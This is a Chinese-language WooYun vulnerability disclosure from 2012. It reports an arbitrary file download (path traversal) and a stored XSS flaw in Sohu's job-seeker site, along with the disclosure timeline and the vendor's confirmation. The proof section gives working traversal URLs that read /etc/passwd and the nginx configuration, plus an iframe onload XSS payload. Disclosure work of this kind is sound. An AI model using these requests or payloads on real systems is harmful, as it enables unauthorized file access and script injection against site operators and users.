漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-012522
漏洞标题:搜狐求职中心任意文件下载和xss漏洞
相关厂商:搜狐
漏洞作者: 心伤的胖子
提交时间:2012-09-21 16:31
修复时间:2012-11-05 16:32
公开时间:2012-11-05 16:32
漏洞类型:任意文件遍历/下载
危害等级:中
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-09-21: 细节已通知厂商并且等待厂商处理中
2012-09-24: 厂商已经确认,细节仅向厂商公开
2012-10-04: 细节向核心白帽子及相关领域专家公开
2012-10-14: 细节向普通白帽子公开
2012-10-24: 细节向实习白帽子公开
2012-11-05: 细节向公众公开
简要描述:
搜狐求职中心某处存在任意文件下载漏洞和存储型xss漏洞
详细说明:
1、任意文件下载漏洞
在个人简历的添加附件处,上传附件后的附件下载地址为
http://hr.sohu.com/backend.php/interface/getdoc/?path=file/src/2012-09-21/xxx.doc&name=xxx.docx
后端程序没有对path进行校验,造成可以下载服务器上的任意文件(在权限允许的范围内)。
2、存储型XSS漏洞
编辑粘贴简历功能处,用的编辑器,但是对很多可以触发xss漏洞的标签等没有做处理,可以触发xss漏洞。
漏洞证明:
1、任意文件下载漏洞
下载/etc/passwd,通过下面的URL:
http://hr.sohu.com/backend.php/interface/getdoc/?path=../../../../etc/passwd&name=passwd.txt
下载nginx的配置文件,通过下面的URL:
http://hr.sohu.com/backend.php/interface/getdoc/?path=../../../../usr/local/nginx/conf/nginx.conf&name=nginx.conf
还可以下载WEB目录内的文件。
2、存储型XSS漏洞
在编辑器中选择源代码,然后输入</textarea><iframe/onload=alert(1)><textarea>
通过下面的URL可以触发xss漏洞,不过该漏洞貌似仅对自己有效,不知道后台编辑会不会出现该问题。
http://hr.sohu.com/resume/addpaste?rid=467486&lid=1&uid=434627&talentTypeId=20&id=467486&op=add&jid=0
修复方案:
总结一下,所有输入输出都是有害的,需要进行严格的校验和过滤。
版权声明:转载请注明来源 心伤的胖子@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2012-09-24 09:57
厂商回复:
最新状态:
暂无